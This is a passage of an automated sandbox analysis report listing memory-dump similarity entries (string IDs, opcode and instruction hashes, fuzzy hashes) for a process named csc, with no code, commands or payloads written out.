                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 4edcca93bcb8c98d69f6a2e21b842cfd834d53546710ce6bb21a61dbbaf1e9b9
                                                      • Instruction ID: d8021e71ccfa79e2393f275320b5be9d458f722c91acc909ddeea11d0d230760
                                                      • Opcode Fuzzy Hash: 4edcca93bcb8c98d69f6a2e21b842cfd834d53546710ce6bb21a61dbbaf1e9b9
                                                      • Instruction Fuzzy Hash: 654115B2D4062DAADF21DA50CCC5FDEB77CAB45714F0045E6EA08AB140DB709E49CFA8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: verifier.dll
                                                      • API String ID: 0-3265496382
                                                      • Opcode ID: 4228018cf0c5b665be206625aa993da1d8b5bbbd9b411d84f4dcbc3d3a9239f3
                                                      • Instruction ID: 5c4d5ef572dfa32772235160eee7ce812b9e4f0a8446fa253b916e0a2d1aa2f2
                                                      • Opcode Fuzzy Hash: 4228018cf0c5b665be206625aa993da1d8b5bbbd9b411d84f4dcbc3d3a9239f3
                                                      • Instruction Fuzzy Hash: 49318371B202219FDB299E289851AF7B7E5FB48710FA8447AE505DF780EA718881C750
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: kLsE
                                                      • API String ID: 0-3058123920
                                                      • Opcode ID: e1d4b9f3af51c0402677222d4b4a70643d383887eef4aa74edfdb313bfc3b238
                                                      • Instruction ID: 5b6a81b8f6027ae9a333287681b7cdfd365ec74e59c8493f5801154d6a4f14f9
                                                      • Opcode Fuzzy Hash: e1d4b9f3af51c0402677222d4b4a70643d383887eef4aa74edfdb313bfc3b238
                                                      • Instruction Fuzzy Hash: 204148726613914AF728AB64D88BBEA3F90FB50724F15065EFC518B2C1CF740887CBA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction ID: f03b0e9f455d607851a07460e51015e5dd2028bc8fe0ee0c9df535da48012b8b
                                                      • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                      • Instruction Fuzzy Hash: 3641AE76A00616ABCF21DF44D890BBEF7B6FF84755F00409AE942A7640DB74E941CBE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Flst
                                                      • API String ID: 0-2374792617
                                                      • Opcode ID: 2e2e89e77a276a02668cef725e58d4fb31e7d2e7b695a84f2931dad2023d3c42
                                                      • Instruction ID: 9a42da9500b7f1ca3b2273cad80e1babdbf87944f45ea812cda9ed903c04a64e
                                                      • Opcode Fuzzy Hash: 2e2e89e77a276a02668cef725e58d4fb31e7d2e7b695a84f2931dad2023d3c42
                                                      • Instruction Fuzzy Hash: 4141DDB22097019FC354CF18D184A56FBE5FB49710F1485AEE85ACF241EBB1DC42CBA2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: L4_wL4_w
                                                      • API String ID: 0-4042522810
                                                      • Opcode ID: 27d8c3f6b86fe523650ddd26b20feeaaf093eb1a89473a6d29935026d4a3badd
                                                      • Instruction ID: 45558f4c87d8eb17da3836be9a15924ce93ccac7c04f7dc892a05ae41b2730cd
                                                      • Opcode Fuzzy Hash: 27d8c3f6b86fe523650ddd26b20feeaaf093eb1a89473a6d29935026d4a3badd
                                                      • Instruction Fuzzy Hash: 572125BBA007149FCB269F58C405B9BBBB5FB84B14F12042DA615DB740DB70EC01CB90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 45ae314f4fb326979a683d7ed21acc424502cf0aaf9247f4a94ef3b762df79a7
                                                      • Instruction ID: d02388b9fcea2609a70d9cf3e46a36bb2bbe5fc7c32e24f4bcff64a71ef75e4d
                                                      • Opcode Fuzzy Hash: 45ae314f4fb326979a683d7ed21acc424502cf0aaf9247f4a94ef3b762df79a7
                                                      • Instruction Fuzzy Hash: A011B6337486028BDF38CE1D9854776729BFB91224F38813AE862CB791E6B5DC41C380
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrCreateEnclave
                                                      • API String ID: 0-3262589265
                                                      • Opcode ID: e4f5997be6f08c1d1305e504a785c9ef1b897924e50c96a80c0d7587dd33c40e
                                                      • Instruction ID: af70f71a1da72d8caa8be2ca82bc46288717f006b17529626ddd854fd626416f
                                                      • Opcode Fuzzy Hash: e4f5997be6f08c1d1305e504a785c9ef1b897924e50c96a80c0d7587dd33c40e
                                                      • Instruction Fuzzy Hash: 7A21F3B1A183549FC324DF2A8845A9BFBE8FBD5B10F404A1FB9A497250DBB09405CB92
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6c1a077cee84c066e7ffc1e6c80e4d27146877201e87a1d7291f94d82f0b05a
                                                      • Instruction ID: e85e22ebced852fd7eca3b2adaa0121b20511c30265541c234e9ef8dbcb0dfb7
                                                      • Opcode Fuzzy Hash: a6c1a077cee84c066e7ffc1e6c80e4d27146877201e87a1d7291f94d82f0b05a
                                                      • Instruction Fuzzy Hash: 27228D742C86518BEB24CF2AC0547B7B7E3BF44204F08849BE8968B786E735D592DF61
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a9bede33e5ae29ae94cd7debd01cca0fcb8fd62c0d090550344fc424b29dda6b
                                                      • Instruction ID: a3bc0ca74a093c8ee080bf8d0b7575bd1a0e2857563473d0d54e96bc91b593f5
                                                      • Opcode Fuzzy Hash: a9bede33e5ae29ae94cd7debd01cca0fcb8fd62c0d090550344fc424b29dda6b
                                                      • Instruction Fuzzy Hash: 7C229E35B042168FCB19CF59C490BFEB7B2BF88314B2495AED956DB344DB30A942CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1b0714445f287c21d11a46f51779311255a99f7979210fc28e6518d483c8e1c6
                                                      • Instruction ID: 121e7dd0820f336b2f55ac3e3bdf34f6725dddcf784fcf8402941e8f5a70de9b
                                                      • Opcode Fuzzy Hash: 1b0714445f287c21d11a46f51779311255a99f7979210fc28e6518d483c8e1c6
                                                      • Instruction Fuzzy Hash: 3AE1C172A08341CFC715CF28C491A6ABBE5FF89304F098A6DF9958B351DB71E905CB92
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb67f81f6ce0d79b1ba84c4ffd8fa35d7106a722be59448be3ba9b277ec03813
                                                      • Instruction ID: 2cf17018ee4ac9780dc340e7a490638f9f5f8c77f72a439bb7960953f1a55a06
                                                      • Opcode Fuzzy Hash: eb67f81f6ce0d79b1ba84c4ffd8fa35d7106a722be59448be3ba9b277ec03813
                                                      • Instruction Fuzzy Hash: 60C1B172A042159BDF28CF58C845BEEB7B6FF84310F28866AD915AB7C4D774E941CB80
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad1e7d531be7b65f7a4b915a42bf65b4b1cee599ccff02ccc6801913ca36986b
                                                      • Instruction ID: 75ddd5328d0ac624df79c8131ae37dca581c33e3ce4ec76b9a77635bd7a884a7
                                                      • Opcode Fuzzy Hash: ad1e7d531be7b65f7a4b915a42bf65b4b1cee599ccff02ccc6801913ca36986b
                                                      • Instruction Fuzzy Hash: E7C12572A042258BEB28CF18C8D5BF977A6FF44714F15515AEE429FBA1DBF08A40CB50
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction ID: 0a158be5cc533f5308d0d41d30634551fe72067e68cdf14abebe1023a8c98de5
                                                      • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                      • Instruction Fuzzy Hash: 15B1C331704645AFEB15DB64C858BFFB7FAEF84200F2405AAD65297A81D770DA41CB90
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec750e66d2c808e155dba86cc09612bde53a9bc666e3d6a9d2c2e5cd03caa7cd
                                                      • Instruction ID: f664f2ec59c8ff0730a7a98238791f2256825c694a23c676b0e6203381a84859
                                                      • Opcode Fuzzy Hash: ec750e66d2c808e155dba86cc09612bde53a9bc666e3d6a9d2c2e5cd03caa7cd
                                                      • Instruction Fuzzy Hash: B0A13A71A04215AFEB169FA4CC45FEF7BB9AF45750F1101A4FA01AB2A0D7B5AD108BA0
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfa0ab4d9bbdd749f29d35486e32525ad3bf70ec9cfa7049414450ecc1be505b
                                                      • Instruction ID: 7f511d2ffa3b50c94f16d7ab34cf5cb8571fc8a3b118a544e51df41b43794bf2
                                                      • Opcode Fuzzy Hash: dfa0ab4d9bbdd749f29d35486e32525ad3bf70ec9cfa7049414450ecc1be505b
                                                      • Instruction Fuzzy Hash: 6DB162B0B042698BDB68DF55C894BA9B3F6FF44700F0485E9D54AE7281EB70DD85CB20
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d2671a750a365fbe0b09ddd4688f05fad86c30ccf54c012c748afd096d11c7e
                                                      • Instruction ID: 48c35a4a0943de12d2024186920325a0e589f05421aac6b96eed8a1f36e722b2
                                                      • Opcode Fuzzy Hash: 9d2671a750a365fbe0b09ddd4688f05fad86c30ccf54c012c748afd096d11c7e
                                                      • Instruction Fuzzy Hash: FCA11631E14624AFDB32DB58C849FEEBBB9BB01714F1501BAEA01AB2D0D7749D44CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0294f8899afec7f3a326fed25d8d0feb0e8fde5d17ddd30c4818236f3b40b96c
                                                      • Instruction ID: 613bf955b5ef46b023a9e2e812658e327a0d2314e1c71855d272dd8a8184f628
                                                      • Opcode Fuzzy Hash: 0294f8899afec7f3a326fed25d8d0feb0e8fde5d17ddd30c4818236f3b40b96c
                                                      • Instruction Fuzzy Hash: DDA1A471B0062ADBDB28DF65C599BBAB7F6FF44314F04402AEA45A72C1DBB4E811CB50
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 311d1a435caa259dc0465b67b8923a279928a8d9b74982b69adbc3d83442c22b
                                                      • Instruction ID: 63b519e97234fb8af60334ff25b7edbf8a97d18e435ceb7938c6309018e9085d
                                                      • Opcode Fuzzy Hash: 311d1a435caa259dc0465b67b8923a279928a8d9b74982b69adbc3d83442c22b
                                                      • Instruction Fuzzy Hash: 36A1CA72A14215AFCB11DF14C984BEABBEAFF48304F02096AF5859B650D374ED01CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed8201d6c68a75d5552014b1c3cf473fc6514f90258cdf38765bc23a8b4946ba
                                                      • Instruction ID: c00b22fbcc83581274bc83078ea69a41a4a572aa53679e9a232731fef97c73d5
                                                      • Opcode Fuzzy Hash: ed8201d6c68a75d5552014b1c3cf473fc6514f90258cdf38765bc23a8b4946ba
                                                      • Instruction Fuzzy Hash: F1B14E776042068FCF29CF18D486BB977F1FF54354F24455AE822AB299DBB1D842CB50
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e98cfed6d70155769176b0bd2eb77d2dc5c44103ccc2f2f1a6538ed28379253
                                                      • Instruction ID: abe9727f4783571d315774ae137aad3ed1a68125c2c016731f66bebb07b69898
                                                      • Opcode Fuzzy Hash: 5e98cfed6d70155769176b0bd2eb77d2dc5c44103ccc2f2f1a6538ed28379253
                                                      • Instruction Fuzzy Hash: 51B10175A093409FD364CF28C580A6AFBE1BB88304F184A6EF99AD7352D771E945CB42
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5fcd45584d0f85ac6e2a594960b94962257475addcdd66d195f69bdd9bae962
                                                      • Instruction ID: c2d8a409649dfc5c604c1372a3f442b8b156a332995ee3a43c72fad70a1474c7
                                                      • Opcode Fuzzy Hash: b5fcd45584d0f85ac6e2a594960b94962257475addcdd66d195f69bdd9bae962
                                                      • Instruction Fuzzy Hash: 04410676A02700CFCB25EF24C945BA6BBF6FF84310F10826AE506DB6A1DB709A41CF51
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ca76d12a91e3ffd5f1ad6356f3a195dda49b68d12ff62d5f4fb802a2ab10d30a
                                                      • Instruction ID: acae7aeaca2715af347bd43990a40344103bfe0c673b33351fbc52f5a579c8a3
                                                      • Opcode Fuzzy Hash: ca76d12a91e3ffd5f1ad6356f3a195dda49b68d12ff62d5f4fb802a2ab10d30a
                                                      • Instruction Fuzzy Hash: CB4171726183509FD720DF25C849FABBBE8FF88654F404A2EF598D7250DB709905CB92
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c774ef236b471f4ba6dd3d010c4e9ffc72495ebbf7c6dafa0aa02c0b2d021308
                                                      • Instruction ID: f194636ed9fa45694936bae7c97a628f680ee6a4605e2489ab8feff1d5ccbaec
                                                      • Opcode Fuzzy Hash: c774ef236b471f4ba6dd3d010c4e9ffc72495ebbf7c6dafa0aa02c0b2d021308
                                                      • Instruction Fuzzy Hash: E241C4726086619FC321DF69D844AABB3E5FFC8700F444A5EF85997780E730E914C7A6
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ec62a2e81455e29df7cfe36b7692f782b81addc552c8f1fb3f890cd7476d5b6
                                                      • Instruction ID: a4dfff7d003488c3779758de31d345efd14c5b2be50ab14f0b79f131edf3ff10
                                                      • Opcode Fuzzy Hash: 0ec62a2e81455e29df7cfe36b7692f782b81addc552c8f1fb3f890cd7476d5b6
                                                      • Instruction Fuzzy Hash: F3319F32701A06EBDB56DB60C988FEAFBAAFF44654F405069E90597E50DB71A820CBD0
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction ID: b325899d44831e69c6fb1f31d080a0f562b6283ebf80f057dd1c6eda5b9a8755
                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction Fuzzy Hash: EA31EA317083419FDF21DA18C808B6BBBE5FB85750F5885AEF4858B785E674EC41C792
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f75bd75332fb788791da0a8f98eac72cf33a3b0dec3755b3d64432e8cd99acf9
                                                      • Instruction ID: c94824d8b64df17d1527a833e23ab54e73380b7fbd674136250d1ebb38f03b05
                                                      • Opcode Fuzzy Hash: f75bd75332fb788791da0a8f98eac72cf33a3b0dec3755b3d64432e8cd99acf9
                                                      • Instruction Fuzzy Hash: 483108B26042049FCB25DF14D450EA6B7AAFF85760F14426DFD454B251DB71ED42CBE0
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 281dc53c3d90818e1047e7832775bd20c38512a7a99faa9192a8dcf292f526f5
                                                      • Instruction ID: 129f238345d396aa57e069ea4e8a171bf4c884544153ddcc4f2fa3e93f37439d
                                                      • Opcode Fuzzy Hash: 281dc53c3d90818e1047e7832775bd20c38512a7a99faa9192a8dcf292f526f5
                                                      • Instruction Fuzzy Hash: FC31C475A00265ABDB19DF98CC84FEEB7B5FB48B40F454169E901EB284D770ED01CB94
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fc6cf20570478db20d32063bb83631489a1c4562395a151b8b7d67e844c6586
                                                      • Instruction ID: cfbec06276798bcc724affd226c5a66371e4dbc9bacd174e37b964e219e7cddc
                                                      • Opcode Fuzzy Hash: 2fc6cf20570478db20d32063bb83631489a1c4562395a151b8b7d67e844c6586
                                                      • Instruction Fuzzy Hash: 8331D173A04611DBCB1BEE648888E6BBBAEEF94650F014529FD55A7310DA30DC0197E5
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d01b36788c27a0f9fcdba5997e461ee1571b95de04de06b15bdcae5fc903769d
                                                      • Instruction ID: 620492a43807807c3c328dfb72f7438077425b16661b6a348eb7c7034e161c93
                                                      • Opcode Fuzzy Hash: d01b36788c27a0f9fcdba5997e461ee1571b95de04de06b15bdcae5fc903769d
                                                      • Instruction Fuzzy Hash: 4A31DF71B00605ABDF26DFA9C851BEFBBBAAF44354F1201ABE605DB341DA70DD018B91
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 878ca8b1700b3d106241cc93a59113856b7b0fdf4c32df0f11d6695f5a37670a
                                                      • Instruction ID: b312d0775abed172cd56a25478a014e4a212db315dcdb86b845ad2c96afffb14
                                                      • Opcode Fuzzy Hash: 878ca8b1700b3d106241cc93a59113856b7b0fdf4c32df0f11d6695f5a37670a
                                                      • Instruction Fuzzy Hash: 15316E766093018FD720CF19C848B6BF7E5FB88710F1549AEE9869B391D7B1E844CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                      • Instruction ID: 23ab493be5b8275bbfd7c8f66ab50e61cd08828a3229c374a7b9c64376484adc
                                                      • Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
                                                      • Instruction Fuzzy Hash: A331BBBA701104AFDF25DE58C985F6E73BAEB80750F158828ED49DB254D3B0DD40CB90
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5f5f6fb82a539f0198ed183278e5d86c366981cc72ad9703ec59ee8b899dede6
                                                      • Instruction ID: ade58e4c158dd69c7e5a4ba0241b487a9062e0354ea3d55520a68f72aeb454d7
                                                      • Opcode Fuzzy Hash: 5f5f6fb82a539f0198ed183278e5d86c366981cc72ad9703ec59ee8b899dede6
                                                      • Instruction Fuzzy Hash: 32318036715A05FFDB56DF24DA84EAABBA6FF44200F54606AE90187F50D775E830CB80
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction ID: 75e1425c036283049a54c1a9365c2f549373f3d6d6df415f6c848a409deae20f
                                                      • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                      • Instruction Fuzzy Hash: 0E313E72B05B00AFD760CF69DE40B57B7F9BB08650F04096DA59AC3B50E670E900CB64
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                      • Instruction ID: 7532645778a182b51b4fa662a5e5c3698ba2698e97097ee03cbdc7f0b4c968d3
                                                      • Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
                                                      • Instruction Fuzzy Hash: C9316A75604206CFC710CF18C48095AFBF6FF89314B2986A9EA599B325E730ED06CB91
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.1567920536.0000000005370000.00000040.00001000.00020000.00000000.sdmp, Offset: 05370000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_14_2_5370000_csc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25789bde5739ccf3b10fad0d75535476853c6a6259653c9788c8de0cfb805452
                                                      • Instruction ID: b5f5e13de02420e79b73e424d7fb99c27cd187171f48c05b093362c3aedb73d5
                                                      • Opcode Fuzzy Hash: 25789bde5739ccf3b10fad0d75535476853c6a6259653c9788c8de0cfb805452
                                                      • Instruction Fuzzy Hash: FB31B4B2A0152CABDF39DB14CC41FEE77BEEB05740F0101A5E645A7290D6B4AE909F91
